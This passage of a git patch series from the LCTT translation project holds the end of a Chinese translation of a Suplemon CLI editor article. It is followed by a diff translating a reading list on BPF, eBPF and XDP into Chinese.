多光标支持 - -* 撤销/重做 - -* 复制和粘贴,带有多行支持 - -* 鼠标支持 - -* 扩展 - -* 查找、查找所有、查找下一个 - -* 语法高亮 - -* 自动完成 - -* 自定义键盘快捷键 - -### 安装 - -首先,确保安装了最新版本的 python3 和 pip3。 - -然后在终端输入: - -``` -$ sudo pip3 install suplemon -``` - -在当前目录中创建一个新文件 - -打开一个终端并输入: - -``` -$ suplemon -``` - -![suplemon new file](https://linoxide.com/wp-content/uploads/2017/11/suplemon-new-file.png) - -打开一个或多个文件 - -打开一个终端并输入: - -``` -$ suplemon ... -``` - -``` -$ suplemon example1.c example2.c -``` - -主要配置 - -你可以在这 ~/.config/suplemon/suplemon-config.json 找到配置文件。 - -编辑这个文件很简单,你只需要进入命令模式(进入 suplemon 后)并运行 config 命令。你可以通过运行 config defaults 来查看默认配置。 - -键盘映射配置 - -我会展示 suplemon 的默认键映射。如果你想编辑它们,只需运行 keymap 命令。运行 keymap default 来查看默认的键盘映射文件。 - -* 退出: Ctrl + Q - -* 复制行到缓冲区:Ctrl + C - -* 剪切行缓冲区: Ctrl + X - -* 插入缓冲区: Ctrl + V - -* 复制行: Ctrl + K - -* 跳转: Ctrl + G。 你可以跳转到一行或一个文件(只需键入一个文件名的开头)。另外,可以输入类似于 “exam:50” 跳转到 example.c 的第 50行。 - -* 用字符串或正则表达式搜索: Ctrl + F - -* 搜索下一个: Ctrl + D - -* 去除空格: Ctrl + T - -* 在箭头方向添加新的光标: Alt + 方向键 - -* 跳转到上一个或下一个单词或行: Ctrl + 左/右 - -* 恢复到单光标/取消输入提示: Esc - -* 向上/向下移动行: Page Up / Page Down - -* 保存文件:Ctrl + S - -* 用新名称保存文件:F1 - -* 重新载入当前文件:F2 - -* 打开文件:Ctrl + O - -* Close file: 关闭文件: - -* 切换到下一个/上一个文件:Ctrl + Page Up / Ctrl + Page Down - -* 运行一个命令:Ctrl + E - -* 撤消:Ctrl + Z - -* 重做:Ctrl + Y - -* 触发可见的空格:F7 - -* 切换鼠标模式:F8 - -* 显示行号:F9 - -* 显示全屏:F11 - -鼠标快捷键 - -* 将光标置于指针位置:左键单击 - -* 在指针位置添加一个光标:右键单击 - -* 垂直滚动:向上/向下滚动滚轮 - -### 总结 - -在尝试 Suplemon 一段时间后,我改变了对 CLI 文本编辑的看法。我以前曾经尝试过 Nano,是的,我喜欢它的简单性,但是它的现代特征的缺乏使它在日常使用中变得不实用。 - -这个工具有 CLI 和 GUI 世界最好的东西。。。简单性和功能丰富!所以我建议你试试看,并在评论中写下你的想法 :-) - --------------------------------------------------------------------------------- - -via: https://linoxide.com/tools/suplemon-cli-text-editor-multi-cursor/ - -作者:[Ivo Ursino][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://linoxide.com/author/ursinov/ -[1]:https://linoxide.com/tools/install-sublime-text-editor-linux/ -[2]:https://github.com/richrd/suplemon/ From 66178831e6cdcf717abb3796af9bcc05b9142db3 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Tue, 12 Dec 2017 16:47:22 +0800 Subject: [PATCH 0508/1627] Translated by qhwdw --- .../tech/20171102 Dive into BPF a list of reading material.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171102 Dive into BPF a list of reading material.md (100%) diff --git a/sources/tech/20171102 Dive into BPF a list of reading material.md b/translated/tech/20171102 Dive into BPF a list of reading material.md similarity index 100% rename from sources/tech/20171102 Dive into BPF a list of reading material.md rename to translated/tech/20171102 Dive into BPF a list of reading material.md From b59ddd53bb940bb9ec0ca12a99929e6824e0ab31 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Tue, 12 Dec 2017 16:48:22 +0800 Subject: [PATCH 0509/1627] Translated by qhwdw --- ...ive into BPF a list of reading material.md | 506 +++++++++--------- 1 file changed, 253 insertions(+), 253 deletions(-) diff --git a/translated/tech/20171102 Dive into BPF a list of reading material.md b/translated/tech/20171102 Dive into BPF a list of reading material.md index d352e4a7c6..91f907436c 100644 --- a/translated/tech/20171102 Dive into BPF a list of reading material.md +++ b/translated/tech/20171102 Dive into BPF a list of reading material.md @@ -1,455 +1,455 @@ -Translating by qhwdw Dive into BPF: a list of reading material +深入理解 BPF:一个阅读清单 ============================================================ -* [What is BPF?][143] +* [什么是 BPF?][143] -* [Dive into the bytecode][144] +* [深入理解字节码( bytecode)][144] -* [Resources][145] - * [Generic presentations][23] - * [About BPF][1] +* [资源][145] + * [简介][23] + * [关于 BPF][1] - * [About XDP][2] + * [关于 XDP][2] - * [About other components related or based on eBPF][3] + * [关于 基于 eBPF 或者 eBPF 相关的其它组件][3] - * [Documentation][24] - * [About BPF][4] + * [文档][24] + * [关于 BPF][4] - * [About tc][5] + * [关于 tc][5] - * [About XDP][6] + * [关于 XDP][6] - * [About P4 and BPF][7] + * [关于 P4 和 BPF][7] - * [Tutorials][25] + * [教程][25] - * [Examples][26] - * [From the kernel][8] + * [示例][26] + * [来自内核的示例][8] - * [From package iproute2][9] + * [来自包 iproute2 的示例][9] - * [From bcc set of tools][10] + * [来自 bcc 工具集的示例][10] - * [Manual pages][11] + * [手册页面][11] - * [The code][27] - * [BPF code in the kernel][12] + * [代码][27] + * [内核中的 BPF 代码][12] - * [XDP hooks code][13] + * [XDP 钩子(hook)代码][13] - * [BPF logic in bcc][14] + * [bcc 中的 BPF 逻辑][14] - * [Code to manage BPF with tc][15] + * [通过 tc 使用代码去管理 BPF][15] - * [BPF utilities][16] + * [BPF 实用工具][16] - * [Other interesting chunks][17] + * [其它感兴趣的 chunks][17] - * [LLVM backend][18] + * [LLVM 后端][18] - * [Running in userspace][19] + * [在用户空间中运行][19] - * [Commit logs][20] + * [提交日志][20] - * [Troubleshooting][28] - * [Errors at compilation time][21] + * [排错][28] + * [编译时的错误][21] - * [Errors at load and run time][22] + * [加载和运行时的错误][22] - * [And still more!][29] + * [更多][29] - _~ [Updated][146] 2017-11-02 ~_ + _~ [更新于][146] 2017-11-02 ~_ -# What is BPF? +# 什么是 BPF? -BPF, as in **B**erkeley **P**acket **F**ilter, was initially conceived in 1992 so as to provide a way to filter packets and to avoid useless packet copies from kernel to userspace. It initially consisted in a simple bytecode that is injected from userspace into the kernel, where it is checked by a verifier—to prevent kernel crashes or security issues—and attached to a socket, then run on each received packet. It was ported to Linux a couple of years later, and used for a small number of applications (tcpdump for example). The simplicity of the language as well as the existence of an in-kernel Just-In-Time (JIT) compiling machine for BPF were factors for the excellent performances of this tool. +BPF,是伯克利包过滤器(**B**erkeley **P**acket **F**ilter)的第一个字母的组合,最初构想于 1992 年,是为了提供一种过滤包的方法,以避免从内核到用户空间的无用的数据包副本。它最初是由从用户空间注入到内核的一个简单的字节码构成,它在哪里通过一个校验器进行检查 — 以避免内核崩溃或者安全问题 — 并附加到一个套接字上,然后运行在每个接收到的包上。几年后它被移植到 Linux 上,并且应用于一小部分应用程序上(例如,tcpdump)。简化的语言以及存在于内核中的即时编译器(JIT),使 BPF 成为一个性能卓越的工具。 -Then in 2013, Alexei Starovoitov completely reshaped it, started to add new functionalities and to improve the performances of BPF. This new version is designated as eBPF (for “extended BPF”), while the former becomes cBPF (“classic” BPF). New features such as maps and tail calls appeared. The JIT machines were rewritten. The new language is even closer to native machine language than cBPF was. And also, new attach points in the kernel have been created. +然后,在 2013 年,Alexei Starovoitov 对 BPF 进行彻底地改造,并增加了新的功能,改善了它的性能。这个新版本被命名为 eBPF (意思是 “extended BPF”),同时将以前的变成 cBPF(意思是 “classic” BPF)。出现了如映射(maps)和 tail 调用(calls)。JIT 编译器被重写了。新的语言比 cBPF 更接近于原生机器语言。并且,在内核中创建了新的附加点。 -Thanks to those new hooks, eBPF programs can be designed for a variety of use cases, that divide into two fields of applications. One of them is the domain of kernel tracing and event monitoring. BPF programs can be attached to kprobes and they compare with other tracing methods, with many advantages (and sometimes some drawbacks). +感谢那些新的钩子,eBPF 程序才可以被设计用于各种各样的使用案例,它分为两个应用领域。其中一个应用领域是内核跟踪和事件监控。BPF 程序可以被附加到 kprobes,并且它与其它跟踪模式相比,有很多的优点(有时也有一些缺点)。 -The other application domain remains network programming. In addition to socket filter, eBPF programs can be attached to tc (Linux traffic control tool) ingress or egress interfaces and perform a variety of packet processing tasks, in an efficient way. This opens new perspectives in the domain. +其它的应用领域是网络程序。除了套接字过滤器,eBPF 程序可以附加到 tc(Linux 流量控制工具) ingress 或者 egress 接口,并且用一种高效的方式去执行各种包处理任务。它在这个领域打开了一个新的思路。 -And eBPF performances are further leveraged through the technologies developed for the IO Visor project: new hooks have also been added for XDP (“eXpress Data Path”), a new fast path recently added to the kernel. XDP works in conjunction with the Linux stack, and relies on BPF to perform very fast packet processing. +并且 eBPF 的性能通过为 IO Visor 项目开发的技术进一步得到提升:也为 XDP(“eXpress Data Path”)增加了新的钩子,它是不久前增加到内核中的一种新的快速路径。XDP 与 Linux 栈一起工作,并且依赖 BPF 去执行更快的包处理。 -Even some projects such as P4, Open vSwitch, [consider][155] or started to approach BPF. Some others, such as CETH, Cilium, are entirely based on it. BPF is buzzing, so we can expect a lot of tools and projects to orbit around it soon… +甚至一些项目,如 P4、Open vSwitch、[考虑][155] 或者开始去接近(approach)BPF。其它的一些,如 CETH、Cilium,则是完全基于它的。BPF 是如此流行,因此,我们可以预计到不久后,将围绕它有很多工具和项目出现 … -# Dive into the bytecode +# 深入理解字节码 -As for me: some of my work (including for [BEBA][156]) is closely related to eBPF, and several future articles on this site will focus on this topic. Logically, I wanted to somehow introduce BPF on this blog before going down to the details—I mean, a real introduction, more developed on BPF functionalities that the brief abstract provided in first section: What are BPF maps? Tail calls? What do the internals look like? And so on. But there are a lot of presentations on this topic available on the web already, and I do not wish to create “yet another BPF introduction” that would come as a duplicate of existing documents. +就像我一样:我的一些工作(包括 [BEBA][156])是非常依赖 eBPF 的,并且在这个网站上以后的几篇文章将关注于这个主题。从逻辑上说,在这篇文章中我在深入到细节之前,希望以某种方式去介绍 BPF — 我的意思是,一个真正的介绍,更多的在 BPF 上开发的功能,它在开始节已经提供了一些简短的摘要:什么是 BPF 映射? Tail 调用?内部结构是什么样子?等等。但是,在这个网站上已经有很多这个主题的介绍了,并且,我也不希望去创建 “另一个 BPF 介绍” 的重复的文章。 -So instead, here is what we will do. After all, I spent some time reading and learning about BPF, and while doing so, I gathered a fair amount of material about BPF: introductions, documentation, but also tutorials or examples. There is a lot to read, but in order to read it, one has to  _find_  it first. Therefore, as an attempt to help people who wish to learn and use BPF, the present article introduces a list of resources. These are various kinds of readings, that hopefully will help you dive into the mechanics of this kernel bytecode. +毕竟,我花费了很多的时间去阅读和学习关于 BPF 的知识,并且,也是这么做的,因此,在这里我们将要做的是,我收集了非常多的关于 BPF 的阅读材料:介绍、文档、也有教程或者示例。这里有很多的材料可以去阅读,但是,为了去阅读它,首先要去 _找到_ 它。因此,为了能够帮助更多想去学习和使用 BPF 的人,现在的这篇文章是介绍了一个资源列表。这里有各种阅读材料,它可以帮你深入理解内核字节码的机制。 -# Resources +# 资源 ![](https://qmonnet.github.io/whirl-offload/img/icons/pic.svg) -### Generic presentations +### 简介 -The documents linked below provide a generic overview of BPF, or of some closely related topics. If you are very new to BPF, you can try picking a couple of presentation among the first ones and reading the ones you like most. If you know eBPF already, you probably want to target specific topics instead, lower down in the list. +这篇文章中下面的链接提供了一个 BPF 的基本的概述,或者,一些与它密切相关的一些主题。如果你对 BPF 非常陌生,你可以在这些介绍文章中挑选出一篇你喜欢的文章去阅读。如果你已经理解了 BPF,你可以针对特定的主题去阅读,下面是阅读清单。 -### About BPF +### 关于 BPF -Generic presentations about eBPF: +关于 eBPF 的简介: -* [_Making the Kernel’s Networking Data Path Programmable with BPF and XDP_][53]  (Daniel Borkmann, OSSNA17, Los Angeles, September 2017): - One of the best set of slides available to understand quickly all the basics about eBPF and XDP (mostly for network processing). +* [_利用 BPF 和 XDP 实现可编程的内核网络数据路径_][53]  (Daniel Borkmann, OSSNA17, Los Angeles, September 2017): + 快速理解所有的关于 eBPF 和 XDP 的基础概念的许多文章中的一篇(大多数是关于网络处理的) -* [The BSD Packet Filter][54] (Suchakra Sharma, June 2017):  - A very nice introduction, mostly about the tracing aspects. +* [BSD 包过滤器][54] (Suchakra Sharma, June 2017):  + 一篇非常好的介绍文章,大多数是关于跟踪方面的。 -* [_BPF: tracing and more_][55]  (Brendan Gregg, January 2017): - Mostly about the tracing use cases. +* [_BPF:跟踪及更多_][55]  (Brendan Gregg, January 2017): + 大多数内容是跟踪使用案例相关的。 -* [_Linux BPF Superpowers_][56]  (Brendan Gregg, March 2016): - With a first part on the use of **flame graphs**. +* [_Linux BPF 的超强功能_][56]  (Brendan Gregg, March 2016): + 第一部分是关于 **火焰图(flame graphs)** 的使用。 * [_IO Visor_][57]  (Brenden Blanco, SCaLE 14x, January 2016): - Also introduces **IO Visor project**. + 介绍了 **IO Visor 项目**。 -* [_eBPF on the Mainframe_][58]  (Michael Holzheu, LinuxCon, Dubin, October 2015) +* [_大型机上的 eBPF_][58]  (Michael Holzheu, LinuxCon, Dubin, October 2015) -* [_New (and Exciting!) Developments in Linux Tracing_][59]  (Elena Zannoni, LinuxCon, Japan, 2015) +* [_在 Linux 上新的(令人激动的)跟踪新产品_][59]  (Elena Zannoni, LinuxCon, Japan, 2015) -* [_BPF — in-kernel virtual machine_][60]  (Alexei Starovoitov, February 2015): - Presentation by the author of eBPF. +* [_BPF — 内核中的虚拟机_][60]  (Alexei Starovoitov, February 2015): + eBPF 的作者写的一篇介绍文章。 -* [_Extending extended BPF_][61]  (Jonathan Corbet, July 2014) +* [_扩展 extended BPF_][61]  (Jonathan Corbet, July 2014) -**BPF internals**: +**BPF 内部结构**: -* Daniel Borkmann has been doing an amazing work to present **the internals** of eBPF, in particular about **its use with tc**, through several talks and papers. - * [_Advanced programmability and recent updates with tc’s cls_bpf_][30]  (netdev 1.2, Tokyo, October 2016): - Daniel provides details on eBPF, its use for tunneling and encapsulation, direct packet access, and other features. +* Daniel Borkmann 正在做的一项令人称奇的工作,它用于去展现 eBPF 的 **内部结构**,特别是通过几次关于 **eBPF 用于 tc ** 的演讲和论文。 + * [_使用 tc 的 cls_bpf 的高级可编程和它的最新更新_][30]  (netdev 1.2, Tokyo, October 2016): + Daniel 介绍了 eBPF 的细节,它使用了隧道和封装、直接包访问、和其它特性。 - * [_cls_bpf/eBPF updates since netdev 1.1_][31]  (netdev 1.2, Tokyo, October 2016, part of [this tc workshop][32]) + * [_自 netdev 1.1 以来的 cls_bpf/eBPF 更新_][31]  (netdev 1.2, Tokyo, October 2016, part of [this tc workshop][32]) - * [_On getting tc classifier fully programmable with cls_bpf_][33]  (netdev 1.1, Sevilla, February 2016): - After introducing eBPF, this presentation provides insights on many internal BPF mechanisms (map management, tail calls, verifier). A must-read! For the most ambitious, [the full paper is available here][34]. + * [_使用 cls_bpf 实现完全可编程的 tc 分类器_][33]  (netdev 1.1, Sevilla, February 2016): + 介绍 eBPF 之后,它提供了许多 BPF 内部机制(映射管理、tail 调用、校验器)的见解。对于大多数有志于 BPF 的人来说,这是必读的![全文在这里][34]。 - * [_Linux tc and eBPF_][35]  (fosdem16, Brussels, Belgium, January 2016) + * [_Linux tc 和 eBPF_][35]  (fosdem16, Brussels, Belgium, January 2016) - * [_eBPF and XDP walkthrough and recent updates_][36]  (fosdem17, Brussels, Belgium, February 2017) + * [_eBPF 和 XDP 攻略和最新更新_][36]  (fosdem17, Brussels, Belgium, February 2017) - These presentations are probably one of the best sources of documentation to understand the design and implementation of internal mechanisms of eBPF. + 这些介绍可能是理解 eBPF 内部机制设计与实现的最佳文档资源之一。 -The [**IO Visor blog**][157] has some interesting technical articles about BPF. Some of them contain a bit of marketing talks. +[**IO Visor 博客**][157] 有一些关于 BPF 感兴趣的技术文章。它们中的一些包含了许多营销讨论。 -**Kernel tracing**: summing up all existing methods, including BPF: +**内核跟踪**:总结了所有的已有的方法,包括 BPF: -* [_Meet-cute between eBPF and Kerne Tracing_][62]  (Viller Hsiao, July 2016): - Kprobes, uprobes, ftrace +* [_邂逅 eBPF 和内核跟踪_][62]  (Viller Hsiao, July 2016): + Kprobes、uprobes、ftrace -* [_Linux Kernel Tracing_][63]  (Viller Hsiao, July 2016): - Systemtap, Kernelshark, trace-cmd, LTTng, perf-tool, ftrace, hist-trigger, perf, function tracer, tracepoint, kprobe/uprobe… +* [_Linux 内核跟踪_][63]  (Viller Hsiao, July 2016): + Systemtap、Kernelshark、trace-cmd、LTTng、perf-tool、ftrace、hist-trigger、perf、function tracer、tracepoint、kprobe/uprobe … -Regarding **event tracing and monitoring**, Brendan Gregg uses eBPF a lot and does an excellent job at documenting some of his use cases. If you are in kernel tracing, you should see his blog articles related to eBPF or to flame graphs. Most of it are accessible [from this article][158] or by browsing his blog. +关于 **事件跟踪和监视**,Brendan Gregg 使用 eBPF 的一些心得,它使用 eBPFR 的一些案例,他做的非常出色。如果你正在做一些内核跟踪方面的工作,你应该去看一下他的关于 eBPF 和火焰图相关的博客文章。其中的大多数都可以 [从这篇文章中][158] 访问,或者浏览他的博客。 -Introducing BPF, but also presenting **generic concepts of Linux networking**: +介绍 BPF,也介绍 **Linux 网络的一般概念**: -* [_Linux Networking Explained_][64]  (Thomas Graf, LinuxCon, Toronto, August 2016) +* [_Linux 网络详解_][64]  (Thomas Graf, LinuxCon, Toronto, August 2016) -* [_Kernel Networking Walkthrough_][65]  (Thomas Graf, LinuxCon, Seattle, August 2015) +* [_内核网络攻略_][65]  (Thomas Graf, LinuxCon, Seattle, August 2015) -**Hardware offload**: +**硬件 offload**(译者注:offload 是指原本由软件来处理的一些操作交由硬件来完成,以提升吞吐量,降低 CPU 负荷。): -* eBPF with tc or XDP supports hardware offload, starting with Linux kernel version 4.9 and introduced by Netronome. Here is a presentation about this feature: - [eBPF/XDP hardware offload to SmartNICs][147] (Jakub Kicinski and Nic Viljoen, netdev 1.2, Tokyo, October 2016) +* eBPF 与 tc 或者 XDP 一起支持硬件 offload,开始于 Linux 内核版本 4.9,并且由 Netronome 提出的。这里是关于这个特性的介绍:[eBPF/XDP hardware offload to SmartNICs][147] (Jakub Kicinski 和 Nic Viljoen, netdev 1.2, Tokyo, October 2016) -About **cBPF**: +关于 **cBPF**: -* [_The BSD Packet Filter: A New Architecture for User-level Packet Capture_][66]  (Steven McCanne and Van Jacobson, 1992): - The original paper about (classic) BPF. +* [_BSD 包过滤器:一个用户级包捕获的新架构_][66] (Steven McCanne 和 Van Jacobson, 1992): + 它是关于(classic)BPF 的最早的论文。 -* [The FreeBSD manual page about BPF][67] is a useful resource to understand cBPF programs. +* [关于 BPF 的 FreeBSD 手册][67] 是理解 cBPF 程序的可用资源。 -* Daniel Borkmann realized at least two presentations on cBPF, [one in 2013 on mmap, BPF and Netsniff-NG][68], and [a very complete one in 2014 on tc and cls_bpf][69]. +* 关于 cBPF,Daniel Borkmann 实现的至少两个演示,[一是,在 2013 年 mmap 中,BPF 和 Netsniff-NG][68],以及 [在 2014 中关于 tc 和 cls_bpf 的的一个非常完整的演示][69]。 -* On Cloudflare’s blog, Marek Majkowski presented his [use of BPF bytecode with the `xt_bpf`module for **iptables**][70]. It is worth mentioning that eBPF is also supported by this module, starting with Linux kernel 4.10 (I do not know of any talk or article about this, though). +* 在 Cloudflare 的博客上,Marek Majkowski 提出的它的 [BPF 字节码与 **iptables** 的 `xt_bpf` 模块一起的应用][70]。值得一提的是,从 Linux 内核 4.10 开始,eBPF 也是通过这个模块支持的。(虽然,我并不知道关于这件事的任何讨论或者文章) -* [Libpcap filters syntax][71] +* [Libpcap 过滤器语法][71] -### About XDP +### 关于 XDP -* [XDP overview][72] on the IO Visor website. +* 在 IO Visor 网站上的 [XDP 概述][72]。 * [_eXpress Data Path (XDP)_][73]  (Tom Herbert, Alexei Starovoitov, March 2016): - The first presentation about XDP. + 这是第一个关于 XDP 的演示。 -* [_BoF - What Can BPF Do For You?_][74]  (Brenden Blanco, LinuxCon, Toronto, August 2016). +* [_BoF - BPF 能为你做什么?_][74]  (Brenden Blanco, LinuxCon, Toronto, August 2016)。 -* [_eXpress Data Path_][148]  (Brenden Blanco, Linux Meetup at Santa Clara, July 2016): - Contains some (somewhat marketing?) **benchmark results**! With a single core: - * ip routing drop: ~3.6 million packets per second (Mpps) +* [_eXpress Data Path_][148]  (Brenden Blanco, Linux Meetup at Santa Clara, July 2016): + 包含一些(有点营销的意思?)**benchmark 结果**!使用一个单核心: + * ip 路由丢弃: ~3.6 百万包每秒(Mpps) - * tc (with clsact qdisc) drop using BPF: ~4.2 Mpps + * 使用 BPF,tc(使用 clsact qdisc)丢弃: ~4.2 Mpps - * XDP drop using BPF: 20 Mpps (<10 % CPU utilization) + * 使用 BPF,XDP 丢弃:20 Mpps (CPU 利用率 < 10%) - * XDP forward (on port on which the packet was received) with rewrite: 10 Mpps + * XDP 重写转发(在端口上它接收到的包):10 Mpps - (Tests performed with the mlx4 driver). + (测试是用 mlx4 驱动执行的)。 -* Jesper Dangaard Brouer has several excellent sets of slides, that are essential to fully understand the internals of XDP. +* Jesper Dangaard Brouer 有几个非常好的幻灯片,它可以从本质上去理解 XDP 的内部结构。 * [_XDP − eXpress Data Path, Intro and future use-cases_][37]  (September 2016): - _“Linux Kernel’s fight against DPDK”_ . **Future plans** (as of this writing) for XDP and comparison with DPDK. + _“Linux 内核与 DPDK 的斗争”_ 。**未来的计划**(在写这篇文章时)它用 XDP 和 DPDK 进行比较。 - * [_Network Performance Workshop_][38]  (netdev 1.2, Tokyo, October 2016): - Additional hints about XDP internals and expected evolution. + * [_网络性能研讨_][38]  (netdev 1.2, Tokyo, October 2016): + 关于 XDP 内部结构和预期演化的附加提示。 - * [_XDP – eXpress Data Path, Used for DDoS protection_][39]  (OpenSourceDays, March 2017): - Contains details and use cases about XDP, with **benchmark results**, and **code snippets** for **benchmarking** as well as for **basic DDoS protection** with eBPF/XDP (based on an IP blacklisting scheme). + * [_XDP – eXpress Data Path, 可用于 DDoS 防护_][39]  (OpenSourceDays, March 2017): + 包含了关于 XDP 的详细情况和使用案例、用于 **benchmarking** 的 **benchmark 结果**、和 **代码片断**,以及使用 eBPF/XDP(基于一个 IP 黑名单模式)的用于 **基本的 DDoS 防护**。 - * [_Memory vs. Networking, Provoking and fixing memory bottlenecks_][40]  (LSF Memory Management Summit, March 2017): - Provides a lot of details about current **memory issues** faced by XDP developers. Do not start with this one, but if you already know XDP and want to see how it really works on the page allocation side, this is a very helpful resource. + * [_内存 vs. 网络,激发和修复内存瓶颈_][40]  (LSF Memory Management Summit, March 2017): + 面对 XDP 开发者提出关于当前 **内存问题** 的许多细节。不要从这一个开始,如果你已经理解了 XDP,并且想去了解它在页面分配方面的真实工作方式,这是一个非常有用的资源。 - * [_XDP for the Rest of Us_][41]  (netdev 2.1, Montreal, April 2017), with Andy Gospodarek: - How to get started with eBPF and XDP for normal humans. This presentation was also summarized by Julia Evans on [her blog][42]. + * [_XDP 能为其它人做什么_][41](netdev 2.1, Montreal, April 2017),with Andy Gospodarek: + 对于普通人使用 eBPF 和 XDP 怎么去开始。这个演示也由 Julia Evans 在 [他的博客][42] 上做了总结。 - (Jesper also created and tries to extend some documentation about eBPF and XDP, see [related section][75].) + ( Jesper 也创建了并且尝试去扩展了有关 eBPF 和 XDP 的一些文档,查看 [相关节][75]。) -* [_XDP workshop — Introduction, experience, and future development_][76]  (Tom Herbert, netdev 1.2, Tokyo, October 2016) — as of this writing, only the video is available, I don’t know if the slides will be added. +* [_XDP 研讨 — 介绍、体验、和未来发展_][76](Tom Herbert, netdev 1.2, Tokyo, October 2016) — 在这篇文章中,只有视频可用,我不知道是否有幻灯片。 -* [_High Speed Packet Filtering on Linux_][149]  (Gilberto Bertin, DEF CON 25, Las Vegas, July 2017) — an excellent introduction to state-of-the-art packet filtering on Linux, oriented towards DDoS protection, talking about packet processing in the kernel, kernel bypass, XDP and eBPF. +* [_在 Linux 上进行高速包过滤_][149]  (Gilberto Bertin, DEF CON 25, Las Vegas, July 2017) — 在 Linux 上的最先进的包过滤的介绍,面向 DDoS 的保护、讨论了关于在内核中进行包处理、内核旁通、XDP 和 eBPF。 -### About other components related or based on eBPF +### 关于 基于 eBPF 或者 eBPF 相关的其它组件 -* [_P4 on the Edge_][77]  (John Fastabend, May 2016): - Presents the use of **P4**, a description language for packet processing, with BPF to create high-performance programmable switches. +* [_在边缘上的 P4_][77]  (John Fastabend, May 2016): + 提出了使用 **P4**,一个包处理的描述语言,使用 BPF 去创建一个高性能的可编程交换机。 -* If you like audio presentations, there is an associated [OvS Orbit episode (#11), called  _**P4** on the Edge_][78] , dating from August 2016\. OvS Orbit are interviews realized by Ben Pfaff, who is one of the core maintainers of Open vSwitch. In this case, John Fastabend is interviewed. +* 如果你喜欢音频的介绍,这里有一个相关的 [OvS Orbit 片断(#11),叫做 _在边缘上的 **P4**_][78],日期是 2016 年 8 月。OvS Orbit 是对 Ben Pfaff 的访谈,它是 Open vSwitch 的其中一个核心维护者。在这个场景中,John Fastabend 是被访谈者。 -* [_P4, EBPF and Linux TC Offload_][79]  (Dinan Gunawardena and Jakub Kicinski, August 2016): - Another presentation on **P4**, with some elements related to eBPF hardware offload on Netronome’s **NFP** (Network Flow Processor) architecture. +* [_P4, EBPF 和 Linux TC Offload_][79]  (Dinan Gunawardena and Jakub Kicinski, August 2016): + 另一个演示 **P4** 的,使用一些相关的元素在 Netronome 的 **NFP**(网络流处理器)架构上去实现 eBPF 硬件 offload。 -* **Cilium** is a technology initiated by Cisco and relying on BPF and XDP to provide “fast in-kernel networking and security policy enforcement for containers based on eBPF programs generated on the fly”. [The code of this project][150] is available on GitHub. Thomas Graf has been performing a number of presentations of this topic: - * [_Cilium: Networking & Security for Containers with BPF & XDP_][43] , also featuring a load balancer use case (Linux Plumbers conference, Santa Fe, November 2016) +* **Cilium** 是一个由 Cisco 最先发起的技术,它依赖 BPF 和 XDP 去提供 “在容器中基于 eBPF 程序,在运行中生成的强制实施的快速的内核中的网络和安全策略”。[这个项目的代码][150] 在 GitHub 上可以访问到。Thomas Graf 对这个主题做了很多的演示: + * [_Cilium: 对容器利用 BPF & XDP 实现网络 & 安全_][43],也特别展示了一个负载均衡的使用案例(Linux Plumbers conference, Santa Fe, November 2016) - * [_Cilium: Networking & Security for Containers with BPF & XDP_][44]  (Docker Distributed Systems Summit, October 2016 — [video][45]) + * [_Cilium: 对容器利用 BPF & XDP 实现网络 & 安全_][44] (Docker Distributed Systems Summit, October 2016 — [video][45]) - * [_Cilium: Fast IPv6 container Networking with BPF and XDP_][46]  (LinuxCon, Toronto, August 2016) + * [_Cilium: 使用 BPF 和 XDP 的快速 IPv6 容器网络_][46] (LinuxCon, Toronto, August 2016) - * [_Cilium: BPF & XDP for containers_][47]  (fosdem17, Brussels, Belgium, February 2017) + * [_Cilium: 为窗口使用 BPF & XDP_][47] (fosdem17, Brussels, Belgium, February 2017) - A good deal of contents is repeated between the different presentations; if in doubt, just pick the most recent one. Daniel Borkmann has also written [a generic introduction to Cilium][80] as a guest author on Google Open Source blog. + 在不同的演示中重复了大量的内容;如果有疑问,就选最近的一个。Daniel Borkmann 作为 Google 开源博客的特邀作者,也写了 [Cilium 简介][80]。 -* There are also podcasts about **Cilium**: an [OvS Orbit episode (#4)][81], in which Ben Pfaff interviews Thomas Graf (May 2016), and [another podcast by Ivan Pepelnjak][82], still with Thomas Graf about eBPF, P4, XDP and Cilium (October 2016). +* 这里也有一个关于 **Cilium** 的播客节目:一个 [OvS Orbit episode (#4)][81],它是 Ben Pfaff 访谈 Thomas Graf (2016 年 5 月),和 [另外一个 Ivan Pepelnjak 的播客][82],仍然是 Thomas Graf 的与 eBPF、P4、XDP 和 Cilium (2016 年 10 月)。 -* **Open vSwitch** (OvS), and its related project **Open Virtual Network** (OVN, an open source network virtualization solution) are considering to use eBPF at various level, with several proof-of-concept prototypes already implemented: +* **Open vSwitch** (OvS),它是 **Open Virtual Network**(OVN,一个开源的网络虚拟化解决方案)相关的项目,正在考虑在不同的层次上使用 eBPF,它已经实现了几个概念验证原型: - * [Offloading OVS Flow Processing using eBPF][48] (William (Cheng-Chun) Tu, OvS conference, San Jose, November 2016) + * [使用 eBPF 的 Offloading OVS 流处理器][48] (William (Cheng-Chun) Tu, OvS conference, San Jose, November 2016) - * [Coupling the Flexibility of OVN with the Efficiency of IOVisor][49] (Fulvio Risso, Matteo Bertrone and Mauricio Vasquez Bernal, OvS conference, San Jose, November 2016) + * [将 OVN 的灵活性与 IOVisor 的高效率相结合][49] (Fulvio Risso, Matteo Bertrone and Mauricio Vasquez Bernal, OvS conference, San Jose, November 2016) - These use cases for eBPF seem to be only at the stage of proposals (nothing merge to OvS main branch) as far as I know, but it will be very interesting to see what comes out of it. + 据我所知,这些 eBPF 的使用案例看上去仅处于提议阶段(并没有合并到 OvS 的主分支中),但是,看它带来了什么将是非常有趣的事情。 -* XDP is envisioned to be of great help for protection against Distributed Denial-of-Service (DDoS) attacks. More and more presentations focus on this. For example, the talks from people from Cloudflare ( [_XDP in practice: integrating XDP in our DDoS mitigation pipeline_][83] ) or from Facebook ( [_Droplet: DDoS countermeasures powered by BPF + XDP_][84] ) at the netdev 2.1 conference in Montreal, Canada, in April 2017, present such use cases. +* XDP 的设计对分布式拒绝访问(DDoS)攻击是非常有用的。越来越多的演示都关注于它。例如,从 Cloudflare 中的人们的讨论([_XDP in practice: integrating XDP in our DDoS mitigation pipeline_][83])或者从 Facebook 上([_Droplet: DDoS countermeasures powered by BPF + XDP_][84])在 netdev 2.1 会议上,在 Montreal、Canada、在 